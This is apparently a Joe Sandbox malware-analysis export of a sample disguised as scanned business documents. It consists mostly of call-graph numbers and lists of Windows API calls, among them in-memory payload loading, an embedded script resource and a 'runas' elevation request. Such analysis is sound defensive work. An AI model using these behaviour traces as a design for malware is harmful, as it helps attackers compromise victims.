calls 96407->96672 96408->96407 96410->96285 96412 28a961 22 API calls 96411->96412 96413 2f6f1d 96412->96413 96414 28a961 22 API calls 96413->96414 96415 2f6f26 96414->96415 96416 2f6f3a 96415->96416 96834 28b567 39 API calls 96415->96834 96418 287510 53 API calls 96416->96418 96419 2f6f57 _wcslen 96418->96419 96420 2f70bf 96419->96420 96421 2f6fbc 96419->96421 96431 2f70e9 96419->96431 96423 284ecb 94 API calls 96420->96423 96422 287510 53 API calls 96421->96422 96425 2f6fc8 96422->96425 96424 2f70d0 96423->96424 96426 2f70e5 96424->96426 96427 284ecb 94 API calls 96424->96427 96429 28a8c7 22 API calls 96425->96429 96432 2f6fdb 96425->96432 96428 28a961 22 API calls 96426->96428 96426->96431 96427->96426 96430 2f711a 96428->96430 96429->96432 96434 28a961 22 API calls 96430->96434 96431->96285 96433 
2f7027 96432->96433 96435 2f7005 96432->96435 96438 28a8c7 22 API calls 96432->96438 96436 287510 53 API calls 96433->96436 96437 2f7126 96434->96437 96439 2833c6 22 API calls 96435->96439 96440 2f7034 96436->96440 96441 28a961 22 API calls 96437->96441 96438->96435 96442 2f700f 96439->96442 96443 2f703d 96440->96443 96444 2f7047 96440->96444 96445 2f712f 96441->96445 96447 287510 53 API calls 96442->96447 96448 28a8c7 22 API calls 96443->96448 96835 2ee199 GetFileAttributesW 96444->96835 96446 28a961 22 API calls 96445->96446 96451 2f7138 96446->96451 96452 2f701b 96447->96452 96448->96444 96450 2f7050 96453 2f7063 96450->96453 96456 284c6d 22 API calls 96450->96456 96454 287510 53 API calls 96451->96454 96455 286350 22 API calls 96452->96455 96458 287510 53 API calls 96453->96458 96464 2f7069 96453->96464 96457 2f7145 96454->96457 96455->96433 96456->96453 96680 28525f 96457->96680 96460 2f70a0 96458->96460 96836 2ed076 57 API calls 96460->96836 96461 2f7166 96722 284c6d 96461->96722 96464->96431 96466 2f71a9 96467 28a8c7 22 API calls 96466->96467 96469 2f71ba 96467->96469 96468 284c6d 22 API calls 96470 2f7186 96468->96470 96471 286350 22 API calls 96469->96471 96470->96466 96473 286b57 22 API calls 96470->96473 96472 2f71c8 96471->96472 96474 286350 22 API calls 96472->96474 96475 2f719b 96473->96475 96476 2f71d6 96474->96476 96477 286b57 22 API calls 96475->96477 96478 286350 22 API calls 96476->96478 96477->96466 96479 2f71e4 96478->96479 96480 287510 53 API calls 96479->96480 96481 2f71f0 96480->96481 96725 2ed7bc 96481->96725 96483 2f7201 96484 2ed4ce 4 API calls 96483->96484 96485 2f720b 96484->96485 96486 287510 53 API calls 96485->96486 96489 2f7239 96485->96489 96487 2f7229 96486->96487 96779 2f2947 96487->96779 96490 284f39 68 API calls 96489->96490 96490->96431 96492 307f59 120 API calls 96491->96492 96493 30959b 96492->96493 96493->96285 96494->96287 96495->96246 96496->96249 96497->96259 96498->96271 96499->96271 96500->96248 96501->96282 
96502->96282 96503->96282 96504->96280 96505->96282 96507 2edbdc GetFileAttributesW 96506->96507 96508 2ed4d5 96506->96508 96507->96508 96509 2edbe8 FindFirstFileW 96507->96509 96508->96285 96509->96508 96510 2edbf9 FindClose 96509->96510 96510->96508 96549 287510 96511->96549 96515 308281 96516 30844f 96515->96516 96520 30828f 96515->96520 96613 308ee4 60 API calls 96516->96613 96519 30845e 96519->96520 96521 30846a 96519->96521 96585 307e86 96520->96585 96537 307fd5 messages 96521->96537 96522 287510 53 API calls 96539 308049 96522->96539 96527 3082c8 96600 29fc70 96527->96600 96530 308302 96607 2863eb 22 API calls 96530->96607 96531 3082e8 96606 2f359c 82 API calls __wsopen_s 96531->96606 96534 3082f3 GetCurrentProcess TerminateProcess 96534->96530 96535 308311 96608 286a50 22 API calls 96535->96608 96537->96401 96538 30832a 96548 308352 96538->96548 96609 2904f0 22 API calls 96538->96609 96539->96515 96539->96522 96539->96537 96604 2e417d 22 API calls __fread_nolock 96539->96604 96605 30851d 42 API calls _strftime 96539->96605 96541 3084c5 96541->96537 96543 3084d9 FreeLibrary 96541->96543 96542 308341 96610 308b7b 75 API calls 96542->96610 96543->96537 96548->96541 96611 2904f0 22 API calls 96548->96611 96612 28aceb 23 API calls messages 96548->96612 96614 308b7b 75 API calls 96548->96614 96550 287522 96549->96550 96551 287525 96549->96551 96550->96537 96572 308cd3 96550->96572 96552 28755b 96551->96552 96553 28752d 96551->96553 96555 2c50f6 96552->96555 96558 28756d 96552->96558 96563 2c500f 96552->96563 96615 2a51c6 26 API calls 96553->96615 96618 2a5183 26 API calls 96555->96618 96556 28753d 96562 29fddb 22 API calls 96556->96562 96616 29fb21 51 API calls 96558->96616 96559 2c510e 96559->96559 96564 287547 96562->96564 96566 29fe0b 22 API calls 96563->96566 96567 2c5088 96563->96567 96565 289cb3 22 API calls 96564->96565 96565->96550 96568 2c5058 96566->96568 96617 29fb21 51 API calls 96567->96617 96569 29fddb 22 API calls 96568->96569 96570 2c507f 
96569->96570 96571 289cb3 22 API calls 96570->96571 96571->96567 96573 28aec9 22 API calls 96572->96573 96574 308cee CharLowerBuffW 96573->96574 96619 2e8e54 96574->96619 96578 28a961 22 API calls 96579 308d2a 96578->96579 96626 286d25 96579->96626 96581 308d3e 96582 2893b2 22 API calls 96581->96582 96584 308d48 _wcslen 96582->96584 96583 308e5e _wcslen 96583->96539 96584->96583 96639 30851d 42 API calls _strftime 96584->96639 96586 307ea1 96585->96586 96590 307eec 96585->96590 96587 29fe0b 22 API calls 96586->96587 96588 307ec3 96587->96588 96589 29fddb 22 API calls 96588->96589 96588->96590 96589->96588 96591 309096 96590->96591 96592 3092ab messages 96591->96592 96599 3090ba _strcat _wcslen 96591->96599 96592->96527 96593 28b38f 39 API calls 96593->96599 96594 28b567 39 API calls 96594->96599 96595 28b6b5 39 API calls 96595->96599 96596 287510 53 API calls 96596->96599 96597 2aea0c 21 API calls ___std_exception_copy 96597->96599 96599->96592 96599->96593 96599->96594 96599->96595 96599->96596 96599->96597 96643 2eefae 24 API calls _wcslen 96599->96643 96601 29fc85 96600->96601 96602 29fd1d VirtualAlloc 96601->96602 96603 29fceb 96601->96603 96602->96603 96603->96530 96603->96531 96604->96539 96605->96539 96606->96534 96607->96535 96608->96538 96609->96542 96610->96548 96611->96548 96612->96548 96613->96519 96614->96548 96615->96556 96616->96556 96617->96555 96618->96559 96620 2e8e74 _wcslen 96619->96620 96621 2e8f63 96620->96621 96623 2e8f68 96620->96623 96625 2e8ea9 96620->96625 96621->96578 96621->96584 96623->96621 96641 29ce60 41 API calls 96623->96641 96625->96621 96640 29ce60 41 API calls 96625->96640 96627 286d91 96626->96627 96628 286d34 96626->96628 96630 2893b2 22 API calls 96627->96630 96628->96627 96629 286d3f 96628->96629 96631 2c4c9d 96629->96631 96632 286d5a 96629->96632 96635 286d62 __fread_nolock 96630->96635 96634 29fddb 22 API calls 96631->96634 96642 286f34 22 API calls 96632->96642 96636 2c4ca7 96634->96636 96635->96581 96637 29fe0b 22 API 
calls 96636->96637 96638 2c4cda 96637->96638 96639->96583 96640->96625 96641->96623 96642->96635 96643->96599 96645 286270 22 API calls 96644->96645 96656 289eb5 96645->96656 96646 289fd2 96647 28a4a1 22 API calls 96646->96647 96648 289fec 96647->96648 96648->96406 96651 2cf7c4 96678 2e96e2 84 API calls __wsopen_s 96651->96678 96652 2cf699 96660 29fddb 22 API calls 96652->96660 96653 28a12c __fread_nolock 96653->96651 96664 28a405 96653->96664 96655 2cf7d2 96662 28a4a1 22 API calls 96655->96662 96656->96646 96656->96651 96656->96652 96656->96653 96659 28a6c3 22 API calls 96656->96659 96656->96664 96667 28a587 22 API calls 96656->96667 96668 28aec9 22 API calls 96656->96668 96669 28a4a1 22 API calls 96656->96669 96673 284573 41 API calls _wcslen 96656->96673 96675 2848c8 23 API calls 96656->96675 96676 2849bd 22 API calls __fread_nolock 96656->96676 96677 28a673 22 API calls 96656->96677 96659->96656 96661 2cf754 96660->96661 96665 29fe0b 22 API calls 96661->96665 96663 2cf7e8 96662->96663 96663->96648 96664->96648 96679 2e96e2 84 API calls __wsopen_s 96664->96679 96665->96653 96667->96656 96670 28a0db CharUpperBuffW 96668->96670 96669->96656 96674 28a673 22 API calls 96670->96674 96672->96410 96673->96656 96674->96656 96675->96656 96676->96656 96677->96656 96678->96655 96679->96648 96681 28a961 22 API calls 96680->96681 96682 285275 96681->96682 96683 28a961 22 API calls 96682->96683 96684 28527d 96683->96684 96685 28a961 22 API calls 96684->96685 96686 285285 96685->96686 96687 28a961 22 API calls 96686->96687 96688 28528d 96687->96688 96689 2c3df5 96688->96689 96690 2852c1 96688->96690 96691 28a8c7 22 API calls 96689->96691 96692 286d25 22 API calls 96690->96692 96693 2c3dfe 96691->96693 96694 2852cf 96692->96694 96695 28a6c3 22 API calls 96693->96695 96696 2893b2 22 API calls 96694->96696 96699 285304 96695->96699 96697 2852d9 96696->96697 96698 286d25 22 API calls 96697->96698 96697->96699 96702 2852fa 96698->96702 96700 285325 96699->96700 96706 2c3e20 
96699->96706 96715 285349 96699->96715 96705 284c6d 22 API calls 96700->96705 96700->96715 96701 286d25 22 API calls 96704 28535a 96701->96704 96703 2893b2 22 API calls 96702->96703 96703->96699 96708 285370 96704->96708 96711 28a8c7 22 API calls 96704->96711 96709 285332 96705->96709 96710 286b57 22 API calls 96706->96710 96707 285384 96712 28538f 96707->96712 96716 28a8c7 22 API calls 96707->96716 96708->96707 96713 28a8c7 22 API calls 96708->96713 96714 286d25 22 API calls 96709->96714 96709->96715 96719 2c3ee0 96710->96719 96711->96708 96717 28a8c7 22 API calls 96712->96717 96720 28539a 96712->96720 96713->96707 96714->96715 96715->96701 96716->96712 96717->96720 96718 284c6d 22 API calls 96718->96719 96719->96715 96719->96718 96837 2849bd 22 API calls __fread_nolock 96719->96837 96720->96461 96723 28aec9 22 API calls 96722->96723 96724 284c78 96723->96724 96724->96466 96724->96468 96726 2ed7d8 96725->96726 96727 2ed7dd 96726->96727 96728 2ed7f3 96726->96728 96730 2ed7ee 96727->96730 96731 28a8c7 22 API calls 96727->96731 96729 28a961 22 API calls 96728->96729 96732 2ed7fb 96729->96732 96730->96483 96731->96730 96733 28a961 22 API calls 96732->96733 96734 2ed803 96733->96734 96735 28a961 22 API calls 96734->96735 96736 2ed80e 96735->96736 96737 28a961 22 API calls 96736->96737 96738 2ed816 96737->96738 96739 28a961 22 API calls 96738->96739 96740 2ed81e 96739->96740 96741 28a961 22 API calls 96740->96741 96742 2ed826 96741->96742 96743 28a961 22 API calls 96742->96743 96744 2ed82e 96743->96744 96745 28a961 22 API calls 96744->96745 96746 2ed836 96745->96746 96747 28525f 22 API calls 96746->96747 96748 2ed84d 96747->96748 96749 28525f 22 API calls 96748->96749 96750 2ed866 96749->96750 96751 284c6d 22 API calls 96750->96751 96752 2ed872 96751->96752 96753 2ed885 96752->96753 96754 2893b2 22 API calls 96752->96754 96755 284c6d 22 API calls 96753->96755 96754->96753 96756 2ed88e 96755->96756 96757 2ed89e 96756->96757 96759 2893b2 22 API calls 96756->96759 96758 
2ed8b0 96757->96758 96760 28a8c7 22 API calls 96757->96760 96761 286350 22 API calls 96758->96761 96759->96757 96760->96758 96762 2ed8bb 96761->96762 96838 2ed978 22 API calls 96762->96838 96764 2ed8ca 96839 2ed978 22 API calls 96764->96839 96766 2ed8dd 96767 284c6d 22 API calls 96766->96767 96768 2ed8e7 96767->96768 96769 2ed8fe 96768->96769 96770 2ed8ec 96768->96770 96771 284c6d 22 API calls 96769->96771 96772 2833c6 22 API calls 96770->96772 96773 2ed907 96771->96773 96774 2ed8f9 96772->96774 96775 2ed925 96773->96775 96776 2833c6 22 API calls 96773->96776 96777 286350 22 API calls 96774->96777 96778 286350 22 API calls 96775->96778 96776->96774 96777->96775 96778->96730 96780 2f2954 __wsopen_s 96779->96780 96781 29fe0b 22 API calls 96780->96781 96782 2f2971 96781->96782 96783 285722 22 API calls 96782->96783 96784 2f297b 96783->96784 96785 2f274e 27 API calls 96784->96785 96786 2f2986 96785->96786 96787 28511f 64 API calls 96786->96787 96788 2f299b 96787->96788 96789 2f29bf 96788->96789 96790 2f2a6c 96788->96790 96791 2f2e66 75 API calls 96789->96791 96792 2f2e66 75 API calls 96790->96792 96793 2f29c4 96791->96793 96794 2f2a38 96792->96794 96828 2f2a75 messages 96793->96828 96844 2ad583 26 API calls 96793->96844 96797 2850f5 40 API calls 96794->96797 96794->96828 96796 2f29ed 96845 2ad583 26 API calls 96796->96845 96798 2f2a91 96797->96798 96799 2850f5 40 API calls 96798->96799 96800 2f2aa1 96799->96800 96801 2850f5 40 API calls 96800->96801 96803 2f2abc 96801->96803 96804 2850f5 40 API calls 96803->96804 96805 2f2acc 96804->96805 96806 2850f5 40 API calls 96805->96806 96807 2f2ae7 96806->96807 96808 2850f5 40 API calls 96807->96808 96809 2f2af7 96808->96809 96810 2850f5 40 API calls 96809->96810 96811 2f2b07 96810->96811 96812 2850f5 40 API calls 96811->96812 96813 2f2b17 96812->96813 96840 2f3017 GetTempPathW GetTempFileNameW 96813->96840 96815 2f2b22 96816 2ae5eb 29 API calls 96815->96816 96826 2f2b33 96816->96826 96817 2f2bed 96818 2ae678 67 API calls 
96817->96818 96819 2f2bf8 96818->96819 96821 2f2bfe DeleteFileW 96819->96821 96822 2f2c12 96819->96822 96820 2850f5 40 API calls 96820->96826 96821->96828 96823 2f2c91 CopyFileW 96822->96823 96830 2f2c18 96822->96830 96824 2f2cb9 DeleteFileW 96823->96824 96825 2f2ca7 DeleteFileW 96823->96825 96841 2f2fd8 CreateFileW 96824->96841 96825->96828 96826->96817 96826->96820 96826->96828 96829 2adbb3 65 API calls 96826->96829 96828->96489 96829->96826 96831 2f22ce 79 API calls 96830->96831 96832 2f2c7c 96831->96832 96832->96824 96833 2f2c80 DeleteFileW 96832->96833 96833->96828 96834->96416 96835->96450 96836->96464 96837->96719 96838->96764 96839->96766 96840->96815 96842 2f2fff SetFileTime CloseHandle 96841->96842 96843 2f3013 96841->96843 96842->96843 96843->96828 96844->96796 96845->96794 96847 28ae01 96846->96847 96850 28ae1c messages 96846->96850 96848 28aec9 22 API calls 96847->96848 96849 28ae09 CharUpperBuffW 96848->96849 96849->96850 96850->96297 96852 28acae 96851->96852 96853 28acd1 96852->96853 96881 2f359c 82 API calls __wsopen_s 96852->96881 96853->96350 96856 2cfadb 96855->96856 96857 28ad92 96855->96857 96858 29fddb 22 API calls 96857->96858 96859 28ad99 96858->96859 96882 28adcd 96859->96882 96862->96346 96863->96349 96864->96349 96865->96301 96866->96339 96867->96317 96868->96339 96869->96339 96870->96350 96871->96350 96872->96350 96873->96350 96874->96350 96875->96350 96876->96332 96877->96339 96878->96336 96879->96343 96880->96339 96881->96853 96886 28addd 96882->96886 96883 28adb6 96883->96350 96884 29fddb 22 API calls 96884->96886 96885 28a961 22 API calls 96885->96886 96886->96883 96886->96884 96886->96885 96887 28a8c7 22 API calls 96886->96887 96888 28adcd 22 API calls 96886->96888 96887->96886 96888->96886 96889->96378 96890->96378 96891->96373 96892->96373 96893->96377 96894->96373 96895 32023b0 96909 3200000 96895->96909 96897 3202470 96912 32022a0 96897->96912 96899 3202499 CreateFileW 96901 32024e8 96899->96901 96902 32024ed 96899->96902 
96902->96901 96903 3202504 VirtualAlloc 96902->96903 96903->96901 96904 3202522 ReadFile 96903->96904 96904->96901 96905 320253d 96904->96905 96906 32012a0 13 API calls 96905->96906 96907 3202570 96906->96907 96908 3202593 ExitProcess 96907->96908 96908->96901 96915 32034a0 GetPEB 96909->96915 96911 320068b 96911->96897 96913 32022a9 Sleep 96912->96913 96914 32022b7 96913->96914 96916 32034ca 96915->96916 96916->96911 96917 281098 96922 2842de 96917->96922 96921 2810a7 96923 28a961 22 API calls 96922->96923 96924 2842f5 GetVersionExW 96923->96924 96925 286b57 22 API calls 96924->96925 96926 284342 96925->96926 96927 2893b2 22 API calls 96926->96927 96941 284378 96926->96941 96928 28436c 96927->96928 96930 2837a0 22 API calls 96928->96930 96929 28441b GetCurrentProcess IsWow64Process 96931 284437 96929->96931 96930->96941 96932 28444f LoadLibraryA 96931->96932 96933 2c3824 GetSystemInfo 96931->96933 96934 28449c GetSystemInfo 96932->96934 96935 284460 GetProcAddress 96932->96935 96938 284476 96934->96938 96935->96934 96937 284470 GetNativeSystemInfo 96935->96937 96936 2c37df 96937->96938 96939 28447a FreeLibrary 96938->96939 96940 28109d 96938->96940 96939->96940 96942 2a00a3 29 API calls __onexit 96940->96942 96941->96929 96941->96936 96942->96921 96943 2b90fa 96944 2b911f 96943->96944 96945 2b9107 96943->96945 96949 2b917a 96944->96949 96957 2b9117 96944->96957 96995 2bfdc4 21 API calls 2 library calls 96944->96995 96993 2af2d9 20 API calls __dosmaperr 96945->96993 96947 2b910c 96994 2b27ec 26 API calls __fread_nolock 96947->96994 96951 2ad955 __fread_nolock 26 API calls 96949->96951 96952 2b9192 96951->96952 96963 2b8c32 96952->96963 96954 2b9199 96955 2ad955 __fread_nolock 26 API calls 96954->96955 96954->96957 96956 2b91c5 96955->96956 96956->96957 96958 2ad955 __fread_nolock 26 API calls 96956->96958 96959 2b91d3 96958->96959 96959->96957 96960 2ad955 __fread_nolock 26 API calls 96959->96960 96961 2b91e3 96960->96961 96962 2ad955 __fread_nolock 26 API calls 
96961->96962 96962->96957 96964 2b8c3e BuildCatchObjectHelperInternal 96963->96964 96965 2b8c5e 96964->96965 96966 2b8c46 96964->96966 96967 2b8d24 96965->96967 96971 2b8c97 96965->96971 96997 2af2c6 20 API calls __dosmaperr 96966->96997 97004 2af2c6 20 API calls __dosmaperr 96967->97004 96970 2b8c4b 96998 2af2d9 20 API calls __dosmaperr 96970->96998 96975 2b8cbb 96971->96975 96976 2b8ca6 96971->96976 96972 2b8d29 97005 2af2d9 20 API calls __dosmaperr 96972->97005 96974 2b8c53 __fread_nolock 96974->96954 96996 2b5147 EnterCriticalSection 96975->96996 96999 2af2c6 20 API calls __dosmaperr 96976->96999 96980 2b8cab 97000 2af2d9 20 API calls __dosmaperr 96980->97000 96981 2b8cc1 96983 2b8cdd 96981->96983 96984 2b8cf2 96981->96984 97001 2af2d9 20 API calls __dosmaperr 96983->97001 96986 2b8d45 __fread_nolock 38 API calls 96984->96986 96989 2b8ced 96986->96989 96987 2b8cb3 97006 2b27ec 26 API calls __fread_nolock 96987->97006 97003 2b8d1c LeaveCriticalSection __wsopen_s 96989->97003 96990 2b8ce2 97002 2af2c6 20 API calls __dosmaperr 96990->97002 96993->96947 96994->96957 96995->96949 96996->96981 96997->96970 96998->96974 96999->96980 97000->96987 97001->96990 97002->96989 97003->96974 97004->96972 97005->96987 97006->96974 97007 2a03fb 97008 2a0407 BuildCatchObjectHelperInternal 97007->97008 97036 29feb1 97008->97036 97010 2a040e 97011 2a0561 97010->97011 97014 2a0438 97010->97014 97063 2a083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 97011->97063 97013 2a0568 97064 2a4e52 28 API calls _abort 97013->97064 97025 2a0477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 97014->97025 97047 2b247d 97014->97047 97016 2a056e 97065 2a4e04 28 API calls _abort 97016->97065 97020 2a0576 97021 2a0457 97023 2a04d8 97055 2a0959 97023->97055 97025->97023 97059 2a4e1a 38 API calls 3 library calls 97025->97059 97027 2a04de 97028 2a04f3 97027->97028 97060 2a0992 GetModuleHandleW 97028->97060 97030 
2a04fa 97030->97013 97031 2a04fe 97030->97031 97032 2a0507 97031->97032 97061 2a4df5 28 API calls _abort 97031->97061 97062 2a0040 13 API calls 2 library calls 97032->97062 97035 2a050f 97035->97021 97037 29feba 97036->97037 97066 2a0698 IsProcessorFeaturePresent 97037->97066 97039 29fec6 97067 2a2c94 10 API calls 3 library calls 97039->97067 97041 29fecb 97046 29fecf 97041->97046 97068 2b2317 97041->97068 97044 29fee6 97044->97010 97046->97010 97050 2b2494 97047->97050 97048 2a0a8c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 97049 2a0451 97048->97049 97049->97021 97051 2b2421 97049->97051 97050->97048 97053 2b2450 97051->97053 97052 2a0a8c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 97054 2b2479 97052->97054 97053->97052 97054->97025 97111 2a2340 97055->97111 97057 2a096c GetStartupInfoW 97058 2a097f 97057->97058 97058->97027 97059->97023 97060->97030 97061->97032 97062->97035 97063->97013 97064->97016 97065->97020 97066->97039 97067->97041 97072 2bd1f6 97068->97072 97071 2a2cbd 8 API calls 3 library calls 97071->97046 97075 2bd213 97072->97075 97076 2bd20f 97072->97076 97073 2a0a8c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 97074 29fed8 97073->97074 97074->97044 97074->97071 97075->97076 97078 2b4bfb 97075->97078 97076->97073 97079 2b4c07 BuildCatchObjectHelperInternal 97078->97079 97090 2b2f5e EnterCriticalSection 97079->97090 97081 2b4c0e 97091 2b50af 97081->97091 97083 2b4c1d 97088 2b4c2c 97083->97088 97104 2b4a8f 29 API calls 97083->97104 97086 2b4c27 97105 2b4b45 GetStdHandle GetFileType 97086->97105 97106 2b4c48 LeaveCriticalSection _abort 97088->97106 97089 2b4c3d __fread_nolock 97089->97075 97090->97081 97092 2b50bb BuildCatchObjectHelperInternal 97091->97092 97093 2b50c8 97092->97093 97094 2b50df 97092->97094 97108 2af2d9 20 API calls __dosmaperr 97093->97108 97107 2b2f5e EnterCriticalSection 97094->97107 97097 2b50cd 97109 2b27ec 26 API calls __fread_nolock 97097->97109 97098 2b50eb 
97102 2b5000 __wsopen_s 21 API calls 97098->97102 97103 2b5117 97098->97103 97101 2b50d7 __fread_nolock 97101->97083 97102->97098 97110 2b513e LeaveCriticalSection _abort 97103->97110 97104->97086 97105->97088 97106->97089 97107->97098 97108->97097 97109->97101 97110->97101 97112 2a2357 97111->97112 97112->97057 97112->97112 97113 28105b 97118 28344d 97113->97118 97115 28106a 97149 2a00a3 29 API calls __onexit 97115->97149 97117 281074 97119 28345d __wsopen_s 97118->97119 97120 28a961 22 API calls 97119->97120 97121 283513 97120->97121 97122 283a5a 24 API calls 97121->97122 97123 28351c 97122->97123 97150 283357 97123->97150 97126 2833c6 22 API calls 97127 283535 97126->97127 97128 28515f 22 API calls 97127->97128 97129 283544 97128->97129 97130 28a961 22 API calls 97129->97130 97131 28354d 97130->97131 97132 28a6c3 22 API calls 97131->97132 97133 283556 RegOpenKeyExW 97132->97133 97134 2c3176 RegQueryValueExW 97133->97134 97138 283578 97133->97138 97135 2c320c RegCloseKey 97134->97135 97136 2c3193 97134->97136 97135->97138 97148 2c321e _wcslen 97135->97148 97137 29fe0b 22 API calls 97136->97137 97139 2c31ac 97137->97139 97138->97115 97141 285722 22 API calls 97139->97141 97140 284c6d 22 API calls 97140->97148 97142 2c31b7 RegQueryValueExW 97141->97142 97143 2c31d4 97142->97143 97145 2c31ee messages 97142->97145 97144 286b57 22 API calls 97143->97144 97144->97145 97145->97135 97146 289cb3 22 API calls 97146->97148 97147 28515f 22 API calls 97147->97148 97148->97138 97148->97140 97148->97146 97148->97147 97149->97117 97151 2c1f50 __wsopen_s 97150->97151 97152 283364 GetFullPathNameW 97151->97152 97153 283386 97152->97153 97154 286b57 22 API calls 97153->97154 97155 2833a4 97154->97155 97155->97126 97156 28dddc 97159 28b710 97156->97159 97160 28b72b 97159->97160 97161 2d00f8 97160->97161 97162 2d0146 97160->97162 97185 28b750 97160->97185 97165 2d0102 97161->97165 97168 2d010f 97161->97168 97161->97185 97201 3058a2 235 API calls 2 library calls 97162->97201 97199 
                                                      [control-flow graph edge data omitted; the rendered graph is not recoverable from the extracted text]

                                                      Control-flow Graph

                                                      [control-flow graph for the function at 2842de: rendered graph not recoverable, edge data omitted]
                                                      APIs
                                                      • GetVersionExW.KERNEL32(?), ref: 0028430D
                                                        • Part of subcall function 00286B57: _wcslen.LIBCMT ref: 00286B6A
                                                      • GetCurrentProcess.KERNEL32(?,0031CB64,00000000,?,?), ref: 00284422
                                                      • IsWow64Process.KERNEL32(00000000,?,?), ref: 00284429
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00284454
                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00284466
                                                      • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00284474
                                                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 0028447B
                                                      • GetSystemInfo.KERNEL32(?,?,?), ref: 002844A0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                      • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                      • API String ID: 3290436268-3101561225
                                                      • Opcode ID: fa01fc76d976b738c48f3d26426013a0e99072afa3922b1a36f6bd5b874d3f13
                                                      • Instruction ID: a0c65188b9ac73d385e63d5d583b861dbf3fc3107cfa8a194bc769554bce21dc
                                                      • Opcode Fuzzy Hash: fa01fc76d976b738c48f3d26426013a0e99072afa3922b1a36f6bd5b874d3f13
                                                      • Instruction Fuzzy Hash: 71A1D36DA3A3C1DFC713EB687C607957FAC6F36346F1899ACD44193A71D2604918CB21

                                                      Control-flow Graph

                                                      [control-flow graph for the function at 2842a2: rendered graph not recoverable, edge data omitted]
                                                      APIs
                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,002850AA,?,?,00000000,00000000), ref: 002842B2
                                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,002850AA,?,?,00000000,00000000), ref: 002842C9
                                                      • LoadResource.KERNEL32(?,00000000,?,?,002850AA,?,?,00000000,00000000,?,?,?,?,?,?,00284F20), ref: 002C35BE
                                                      • SizeofResource.KERNEL32(?,00000000,?,?,002850AA,?,?,00000000,00000000,?,?,?,?,?,?,00284F20), ref: 002C35D3
                                                      • LockResource.KERNEL32(002850AA,?,?,002850AA,?,?,00000000,00000000,?,?,?,?,?,?,00284F20,?), ref: 002C35E6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                      • String ID: SCRIPT
                                                      • API String ID: 3051347437-3967369404
                                                      • Opcode ID: 16c04b99ca883f66af9fb7add768e29ef08e43251e5533a7fc8b195958ad0888
                                                      • Instruction ID: 09e6cb130b3bf99ae4af044e2d88694d4c2d1bd7a65952c896be13cc3aa27a88
                                                      • Opcode Fuzzy Hash: 16c04b99ca883f66af9fb7add768e29ef08e43251e5533a7fc8b195958ad0888
                                                      • Instruction Fuzzy Hash: 2111A074251306BFDB22AF65DC48FA77BBDEBC9B55F108569F802C6190DB71E810C620

                                                      Control-flow Graph

                                                      APIs
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00282B6B
                                                        • Part of subcall function 00283A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00351418,?,00282E7F,?,?,?,00000000), ref: 00283A78
                                                        • Part of subcall function 00289CB3: _wcslen.LIBCMT ref: 00289CBD
                                                      • GetForegroundWindow.USER32(runas,?,?,?,?,?,00342224), ref: 002C2C10
                                                      • ShellExecuteW.SHELL32(00000000,?,?,00342224), ref: 002C2C17
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
